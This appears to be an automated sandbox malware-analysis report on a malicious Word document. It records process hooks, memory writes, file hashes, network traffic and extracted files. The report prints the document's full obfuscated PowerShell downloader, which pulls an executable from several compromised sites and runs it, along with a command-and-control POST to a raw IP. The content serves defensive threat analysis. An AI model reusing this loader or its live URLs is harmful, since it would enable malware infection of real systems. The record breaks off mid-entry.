"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B1069311-A861-4BFD-9969-2C8C5C826436}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{061576E4-2B1D-49B2-BE1F-453A66FB6A6A}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{061576E4-2B1D-49B2-BE1F-453A66FB6A6A}.tmp"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "https://www.microsoft.com/"
Pattern match: "www.eteensblog.com"
Pattern match: "l.ri/Smalllalivory"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://ogp.me/ns/fb#"
Pattern match: "http://gmpg.org/xfn/11/"
Pattern match: "http://www.eteensblog.com/xmlrpc.php/"
Pattern match: "http://www.eteensblog.com/feed/"
Pattern match: "http://www.eteensblog.com/comments/feed/"
Pattern match: "www.eteensblog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/css/style.min.css?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/css/shoppable-images-front.min.css?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.6.8"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/css/youtube.min.css?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/css/video-playlist.min.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/gallery/css/gallery.min.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.magnific-popup/magnific-popup.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/css/snax.min.css?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/css/snax-frontend-submission.min.css?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.tagit/css/jquery.tagit.css?ver=2.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.tagit/css/tagit.ui-zendesk.css?ver=2.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/froala_editor.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/froala_style.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/quick_insert.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/char_counter.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/line_breaker.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=6.0.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/whats-your-reaction/css/main.min.css?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css?ver=4.2.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/all-light.min.css?ver=7.3.2"
Pattern match: "fonts.googleapis.com/css?family=Roboto%3A400%2C300%2C500%2C600%2C700%2C900%7CPoppins%3A400%2C300%2C500%2C600%2C700&subset=latin%2Clatin-ext&ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/uploads/dynamic-style-1567123380.css"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?ver=6.0.3"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/snax-extra-light.min.css?ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/vc-light.min.css?ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/mashshare-light.min.css?ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wp-gdpr-compliance/assets/css/front.css?ver=1567040647"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/js/slideup.js?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/includes/shoppable-images/assets/js/shoppable-images-front.js?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/js/coupons.js?ver=1.3.2"
Pattern match: "www.eteensblog.com\/sweet-18yr-old-rion-makes-her-debut\/,title:Sweet+18yr+Old+Rion+Makes+Her+Debut,image:http:\/\/www.eteensblog.com\/wp-content\/uploads\/2019\/08\/rion00001.jpg,desc:This"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.6.8"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/plupload/moxie.min.js?ver=1.3.5"
Pattern match: "http://www.eteensblog.com/wp-includes/js/plupload/plupload.min.js?ver=2.1.9"
Pattern match: "www.eteensblog.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/,ID:,token:1123317ede,debug"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wordpress-popular-posts/public/js/wpp-4.2.0.min.js?ver=4.2.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/modernizr/modernizr-custom.min.js?ver=3.3.0"
Pattern match: "https://api.w.org/"
Pattern match: "http://www.eteensblog.com/xmlrpc.php?rsd"
Pattern match: "http://www.eteensblog.com/wp-includes/wlwmanifest.xml"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot?#iefix"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.woff"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.ttf"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.svg#bimber"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/mode-dark.min.css"
Pattern match: "http://schema.org/WebPage"
Pattern match: "http://www.eteensblog.com/"
Pattern match: "http://www.eteensblog.com"
Pattern match: "https://www.facebook.com/YOUR_USERNAME/"
Pattern match: "https://twitter.com/YOUR_USERNAME"
Pattern match: "http://www.eteensblog.com/?s="
Pattern match: "http://www.eteensblog.com/the-last-word-information-that-will-free-essay/"
Pattern match: "http://www.eteensblog.com/die-gefahr-die-anwendung-schreiben-eine-2/"
Pattern match: "http://www.eteensblog.com/ghost-writing-kein-geheimnis-mehr-2/"
Pattern match: "http://www.eteensblog.com/die-durchgesickerten-geheimnisse-der-wissenschaftlichen-hausarbeit-aufgedeckt-2/"
Pattern match: "http://www.eteensblog.com/the-leaked-secret-to-best-online-essay-writers-discovered-2/"
Pattern match: "http://www.eteensblog.com/short-article-reveals-the-undeniable-facts-about-best-essay-writer-and-how-it-can-affect-you-2/"
Pattern match: "http://www.eteensblog.com/category/teen-videos/"
Pattern match: "http://www.eteensblog.com/the-one-thing-to-do-for-what-is-a-term-math-2/"
Pattern match: "http://www.eteensblog.com/sweet-18yr-old-rion-makes-her-debut/"
Pattern match: "http://www.eteensblog.com/author/robet/"
Pattern match: "http://0.gravatar.com/avatar/f3473c0c2d4d166102cde6542292aa62?s=30&d=mm&r=g"
Pattern match: "https://wordpress.org/plugins/mailchimp-for-wp/"
Pattern match: "http://www.eteensblog.com/hearsay-deception-and-examples-of-essay-about-myself-3/"
Pattern match: "http://www.eteensblog.com/author/"
Pattern match: "http://1.gravatar.com/avatar/?s=30&d=mm&r=g"
Pattern match: "http://www.eteensblog.com/the-good-the-bad-and-language-translation-4/"
Pattern match: "http://2.gravatar.com/avatar/?s=30&d=mm&r=g"
Pattern match: "http://www.eteensblog.com/top-choices-of-structural-formula-chemistry-4/"
Pattern match: "http://0.gravatar.com/avatar/?s=30&d=mm&r=g"
Pattern match: "http://www.eteensblog.com/the-secret-to-entropy-chemistry-3/"
Pattern match: "http://www.eteensblog.com/the-ultimate-brain-chemistry-trick-4/"
Pattern match: "http://www.eteensblog.com/short-article-reveals-the-undeniable-facts-about-physics-project-and-how-it-can-affect-you-4/"
Pattern match: "http://www.eteensblog.com/what-to-expect-from-biology-conjugation-4/"
Pattern match: "http://www.eteensblog.com/lyse-biology-help-4/"
Pattern match: "http://www.eteensblog.com/page/2/"
Pattern match: "http://www.eteensblog.com/2019/10/"
Pattern match: "http://www.eteensblog.com/2019/08/"
Pattern match: "http://www.eteensblog.com/2015/11/"
Pattern match: "http://www.eteensblog.com/2015/10/"
Pattern match: "http://www.eteensblog.com/2015/09/"
Pattern match: "http://www.eteensblog.com/2015/08/"
Pattern match: "http://www.eteensblog.com/2015/07/"
Pattern match: "http://www.eteensblog.com/2015/06/"
Pattern match: "http://www.eteensblog.com/2015/05/"
Pattern match: "http://www.eteensblog.com/2015/04/"
Pattern match: "http://www.eteensblog.com/2015/03/"
Pattern match: "http://www.eteensblog.com/2015/02/"
Pattern match: "http://www.eteensblog.com/2015/01/"
Pattern match: "http://www.eteensblog.com/2014/12/"
Pattern match: "http://www.eteensblog.com/2014/11/"
Pattern match: "http://www.eteensblog.com/2014/10/"
Pattern match: "http://www.eteensblog.com/2014/09/"
Pattern match: "http://www.eteensblog.com/2014/08/"
Pattern match: "http://www.eteensblog.com/2014/07/"
Pattern match: "http://www.eteensblog.com/2014/06/"
Pattern match: "http://www.eteensblog.com/category/uncategorized/"
Pattern match: "http://www.eteensblog.com/?snax_login_popup"
Pattern match: "https://wordpress.org/"
Pattern match: "http://www.eteensblog.com/wp-login.php"
Pattern match: "http://www.eteensblog.com/?snax_login_popup=forgot_password"
Pattern match: "http://www.eteensblog.com/wp-login.php?action=lostpassword"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/g1-socials/css/screen-basic.min.css?ver=1.2.10"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/g1-socials/css/snapcode.min.css?ver=1.2.10"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/lazysizes/lazysizes.min.js?ver=4.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/youtube.js?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/js/mejs-renderers/vimeo.min.js?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/js/playlist.js?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/gallery/js/gallery.js?ver=1.3.3"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\home_url\:\http:\\\/\\\/www.eteensblog.com\,\user_id\:0,\post_id\:0,\nonce\:\7500a30bd0\,\history\:\off\,\i18n\:{\are_you_sure_remove\:\Entire"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/collections.min.js?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.magnific-popup/jquery.magnific-popup.min.js?ver=1.1.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.timeago/jquery.timeago.js?ver=1.5.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.timeago/locales/jquery.timeago.en.js"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/plupload/handlers.js?ver=1.43"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\site_url\:\http:\\\/\\\/www.eteensblog.com\,\autosave_interval\:60,\use_login_recaptcha\:false,\recaptcha_api_url\:\https:\\\/\\\/www.google.com\\\/recaptcha\\\/api.js\,\recaptcha_version\:\"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/front.js?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/featured-image.js?ver=1.43"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\error_msg\:\Some"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/whats-your-reaction/js/front.js?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/flickity/flickity.pkgd.min.js?ver=2.0.9"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/stickyfill/stickyfill.min.js?ver=2.0.3"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/jquery.placeholder/placeholders.jquery.min.js?ver=4.0.1"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/matchmedia/matchmedia.js"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/matchmedia/matchmedia.addlistener.js"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/picturefill/picturefill.min.js?ver=2.3.1"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/jquery.waypoints/jquery.waypoints.min.js?ver=4.0.0"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/libgif/libgif.js"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/enquire/enquire.min.js?ver=2.1.2"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-sanitize.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-a11y.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\timeago\:\on\,\sharebar\:\on\,\microshare\:\on\,\i18n\:{\menu\:{\go_to\:\Go"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/front.js?ver=7.3.2"
Pattern match: "www.eteensblog.com\/wp-admin\/admin-ajax.php,ajaxSecurity:fc820b0b2a,isMultisite:,path:\/,blogId"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wp-gdpr-compliance/assets/js/front.js?ver=1567040647"
Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-embed.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.3"
- source
- File/Memory
- relevance
- 10/10
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"<link rel='stylesheet' id='mace-lazy-load-youtube-css' href='http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/css/youtube.min.css?ver=1.3.3' type='text/css' media='all' />" (Indicator: "youtube")
"var mashsb = {"shares":"0","round_shares":"1","animate_shares":"0","dynamic_buttons":"0","share_url":"http:\/\/www.eteensblog.com\/sweet-18yr-old-rion-makes-her-debut\/","title":"Sweet+18yr+Old+Rion+Makes+Her+Debut","image":"http:\/\/www.eteensblog.com\/wp-content\/uploads\/2019\/08\/rion00001.jpg","desc":"This week's Exploitedteens episode features the dark-haired (and a little mysterious-looking) 18 year old Rion. Yes, that's a very odd name... but I didn't name her (Heh- Heh!). So Rion is brand new to this, \u2026","hashtag":"","subscribe":"link","subscribe_url":"","activestatus":"1","singular":"0","twitter_popup":"1","refresh":"0","nonce":"e70c8dcd53","postid":"","servertime":"1570222740","ajaxurl":"http:\/\/www.eteensblog.com\/wp-admin\/admin-ajax.php"};" (Indicator: "twitter")
"<a class="g1-socials-item-link" href="https://www.facebook.com/YOUR_USERNAME/" target="_blank">" (Indicator: "facebook.com")
"<li class="g1-socials-item g1-socials-item-twitter">" (Indicator: "twitter")
"<a class="g1-socials-item-link" href="https://twitter.com/YOUR_USERNAME" target="_blank">" (Indicator: "twitter")
"<span class="g1-socials-item-icon g1-socials-item-icon-48 g1-socials-item-icon-text g1-socials-item-icon-twitter"></span>" (Indicator: "twitter")
"<span class="g1-socials-item-tooltip-inner">Twitter</span>" (Indicator: "twitter")
"<script type='text/javascript' src='http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/youtube.js?ver=1.3.3'></script>" (Indicator: "youtube")
- source
- File/Memory
- relevance
- 7/10
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
- source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "460be488f57ad501" to virtual address "0xE8F02350" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e933efddffcccc" to virtual address "0xFDB11210" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e94b9fddffcccccccccc" to virtual address "0xFDB16230" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "d708e488f57ad501" to virtual address "0xF28371C0" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "48b8bc5284e6fe070000ffe0" to virtual address "0x77649020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "997df288f57ad501" to virtual address "0xF4C40160" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "4b0ace88f57ad501" to virtual address "0xF4ACDE48" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e913b0e9ff" to virtual address "0xFDA550C0" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "24a0000000448b84" to virtual address "0xF483E228" (part of module "GKWORD.DLL")
"WINWORD.EXE" wrote bytes "e9abc0ddffcc" to virtual address "0xFDB14060" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e933f0ddff" to virtual address "0xFDB11180" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "9b72cc8cf57ad501" to virtual address "0xF3A925D8" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "d002c2e6fe070000" to virtual address "0xFDABA558" (part of module "OLE32.DLL")
"WINWORD.EXE" wrote bytes "4e0ee488f57ad501" to virtual address "0xF5F4FA00" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "9d129888f57ad501" to virtual address "0xE7C5D610" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "5855bd88f57ad501" to virtual address "0x3F0F3258" (part of module "WINWORD.EXE")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xEADF755E" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "9004018ff57a0000" to virtual address "0xEAB81D70" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xEADF760D" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042590150000" to virtual address "0xEADF8C0B" (part of module "MSCORWKS.DLL")
- source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
File Details
RE_583658295301_1004.doc
- Filename
- RE_583658295301_1004.doc
- Size
- 187KiB (190976 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: SCSI, Subject: Streamlined, Author: Gwen Labadie, Comments: port implementation, Template: Normal.dotm, Last Saved By: Alysha Bauch, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 4 16:51:00 2019, Last Saved Time/Date: Fri Oct 4 16:51:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0
- Architecture
- WINDOWS
- SHA256
- 97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f
- MD5
- 1ce6bf7b27e020fcb32d479495d5d0f8
- SHA1
- 71cd3820f795b42b9cd3bef387f574fa10ac34a1
- ssdeep
- 3072:TsTXo9V8rbIKgdzSrG2KyIwLx3+f2qxNjpWlsejBa/RG9GH7Edks:TsTXo9V8rbIKUzSZnLx3+f2qxNj6sej/
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Hybrid Analysis
Analysed 6 processes in total.
- WINWORD.EXE /n "C:\RE_583658295301_1004.doc" (PID: 3988)
- powershell.exe powershell -enco ... (PID: 2684, Additional Context: <# https://www.microsoft.com/ #> $motivatingquq='Intelligentbqv';$modelsvhz = '897';$Assistantopz='Handcraftedcrd';$solid_statezch=$env:userprofile+'\'+$modelsvhz+'.exe';$plumkqj='US_Dollarjsz';$greenjwa=.('n'+'ew'+'-ob'+'ject') neT.webCLienT;$Rustic_Cotton_Fishsvl='http://www.eteensblog.com/2tgmnk/fJZIPCYV/@http://www.palisek.cz/wp-includes/YtgJbWQNtJ/@http://www.mnminfrasolutions.com/wp-admin/zeteXeJYC/@http://abbasargon.com/wp-admin/sqhztj4_dzq3e-019802155/@https://weiqing7.com/ex6/3r2js_ocgr3bew87-538460/'."s`PLiT"('@');$Graphical_User_Interfacezvu='Advancedinf';foreach($US_Dollarrbr in $Rustic_Cotton_Fishsvl){try{$greenjwa."D`owN`LOAdfiLE"($US_Dollarrbr, $solid_statezch);$wirelessfud='worldclassnkp';If ((.('G'+'et-'+'Item') $solid_statezch)."Le`NgTh" -ge 27543) {[Diagnostics.Process]::"s`TArt"($solid_statezch);$arrayvhc='maroonhat';break;$Azerbaijanwjk='calculateufw'}}catch{}}$Guyanalsw='Locksmvo')
- capprep.exe (PID: 3396) 13/69
- capprep.exe --83c0e935 (PID: 2400) 13/69
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
www.eteensblog.com | 146.82.206.253 (TTL: 1799) | DNC Holdings, Inc (Organization: BGP, LLC; Name Server: NS1.SWIFTWILL.COM; Creation Date: Mon, 16 Jan 2006 13:41:27 GMT) | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
146.82.206.253 | 80 TCP | powershell.exe (PID: 2684) | United States |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL |
---|---|---|
146.82.206.253:80 (www.eteensblog.com) | GET | www.eteensblog.com/2tgmnk/fJZIPCYV/ |
172.105.11.15:8080 | POST | 172.105.11.15/dma/usbccid/sess/ |
Raw request to 146.82.206.253:80:
GET /2tgmnk/fJZIPCYV/ HTTP/1.1
Host: www.eteensblog.com
Connection: Keep-Alive
Raw request to 172.105.11.15:8080:
POST /dma/usbccid/sess/ HTTP/1.1
Referer: http://172.105.11.15/dma/usbccid/sess/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 172.105.11.15:8080
Content-Length: 475
Connection: Keep-Alive
Cache-Control: no-cache
Extracted Strings
Extracted Files
Displaying 20 extracted file(s). The remaining 1 file(s) are available in the full version and XML/JSON reports.
-
Malicious 1
-
-
897.exe
- Size
- 324KiB (331776 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Packed-FVW" (13/69)
- Runtime Process
- powershell.exe (PID: 2684)
- MD5
- 79a034603b74bc49dbdfe60388a94af7
- SHA1
- ec3874002e4965fb7f750f7dee1958d7a897edf5
- SHA256
- c423b918e18b82ec4d36391f7f631f9514be8f0a087fc987faf6d0592c8ec2ae
-
-
Clean 1
-
-
~__583658295301_1004.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/55
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative 18
-
-
RE_583658295301_1004.LNK
- Size
- 513B (513 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 20:52:48 2019, mtime=Fri Oct 4 20:52:48 2019, atime=Fri Oct 4 20:52:56 2019, length=190976, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- 19688e55b075c76518f7aa29b8325b4a
- SHA1
- bbe5adc1d4616e0effdfc2a577fa672f011ea6d5
- SHA256
- ee9c184e79d73d04f4761fa7698ca5aecdca8ec936f4aeeb2e931bf27140f3cb
-
index.dat
- Size
- 136B (136 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- 7afac5a816c1b3243f03b5807f571684
- SHA1
- 92c4d863ac2fa3735983dc17efe815a2778a59d9
- SHA256
- 60c2f6a6102086f553d5d6e4785f4bda4de1a0a41fb32d6221c449d3375b1b1c
-
N8JKJMHQ1SGAVY4IHO3E.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2684)
- MD5
- 590c0e4f4d18b55aae61cfb2589eb78c
- SHA1
- a90c0ef9eb14551c7d5b2a577ff74d6dde56fc4e
- SHA256
- ae5b772f817e11877e69a1dd6ad51fe539abfb365ec14ea1cb9c0d4618b70bbd
-
386260D7.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- f4720dd3b6f122066c4628d2c80794a9
- SHA1
- 4aa223378432de4b3d087c5a48670f854ffcc81d
- SHA256
- c38e0c4ec3054966ad93028a6e8de26df311a9afb246e93eb1cfb90fe247b287
-
3B6F62A9.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- 4d8945242d5fa38fad8906549e09a581
- SHA1
- 0828357bbb13c9a56724fb5c612eacf25d45f360
- SHA256
- 0aab093b38ad40aaa2af87d3f4cebbd2e9fdfcf0dcf17998f1766e4f750baa8d
-
443E14AE.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- fcd5e5a27e4fe59edcd4e74e6e1fc729
- SHA1
- 6c0d2fa4ce5895b55cb0b2f496bd5c6fef3cbce8
- SHA256
- 83fe77a98a9d4e89dfb299032ad649d9f1f78c10735edc7a81d1a318598685b1
-
4F9A5442.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- fcd5e5a27e4fe59edcd4e74e6e1fc729
- SHA1
- 6c0d2fa4ce5895b55cb0b2f496bd5c6fef3cbce8
- SHA256
- 83fe77a98a9d4e89dfb299032ad649d9f1f78c10735edc7a81d1a318598685b1
-
5FB2BDA0.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- fcd5e5a27e4fe59edcd4e74e6e1fc729
- SHA1
- 6c0d2fa4ce5895b55cb0b2f496bd5c6fef3cbce8
- SHA256
- 83fe77a98a9d4e89dfb299032ad649d9f1f78c10735edc7a81d1a318598685b1
-
80E439F.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- ef90eb24766a1df48ae3fe2dbccef5c2
- SHA1
